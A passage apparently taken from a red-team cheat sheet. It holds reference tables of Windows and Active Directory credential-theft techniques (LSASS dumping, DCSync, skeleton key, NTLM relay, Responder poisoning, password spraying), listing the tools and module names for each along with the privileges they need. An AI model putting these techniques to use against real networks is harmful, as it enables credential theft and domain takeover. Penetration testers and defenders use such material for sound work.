Credentials

Quick Reference Attack Tool Privilege Required LSASS dump (live) Mimikatz LocalAdmin + SeDebugPrivilege LSASS dump (ProcDump) ProcDump / comsvcs.dll LocalAdmin DCSync Mimikatz lsadump::dcsync Domain Admin (or replication rights) Local SAM reg save + secretsdump LocalAdmin LSA Secrets Mimikatz lsadump::lsa SYSTEM Cached domain creds Mimikatz lsadump::cache SYSTEM GPP passwords PowerSploit Get-GPPPassword Domain User (SYSVOL read) DPAPI triage SharpDPAPI LocalAdmin (backup key needs DA) WDigest cleartext Mimikatz sekurlsa::wdigest LocalAdmin + WDigest enabled Skeleton key Mimikatz misc::skeleton Domain Admin (DC access) SSP injection Mimikatz misc::memssp SYSTEM on DC Password spray DomainPasswordSpray / Rubeus Domain User PPL bypass mimidrv.sys kernel driver SYSTEM + vulnerable driver Mimikatz — Core Commands Mimikatz is the primary credential extraction tool for Windows. Most operations require SeDebugPrivilege at minimum, and many require SYSTEM. ...

Quick Reference Technique Tool Prerequisite Output LLMNR/NBT-NS Poisoning Responder Network access, no SMB signing required NTLMv1/v2 hashes SMB Relay ntlmrelayx.py SMB signing disabled on target SAM dump / shell LDAP Relay ntlmrelayx.py LDAP on DC accessible Computer accounts / RBCD IPv6 Poisoning mitm6 + ntlmrelayx IPv6 not disabled on network LDAP relay → DA Coercion + Relay PetitPotam / printerbug Auth path to coerced machine NTLM relay or TGT DCSync secretsdump.py Domain Admin or replication rights All NTLM hashes + AES keys LSASS Dump lsassy Local admin on target Plaintext / hashes GPP Passwords nxc -M gpp_password Domain user Cleartext credential Password Spraying nxc smb/ldap Valid username list Valid credentials LLMNR/NBT-NS Poisoning with Responder LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are fallback name resolution protocols used by Windows when DNS fails. When a host cannot resolve a name, it broadcasts an LLMNR/NBT-NS query to the local subnet. Responder answers these queries with the attacker’s IP, forcing the victim to authenticate — capturing NTLMv1 or NTLMv2 hashes. ...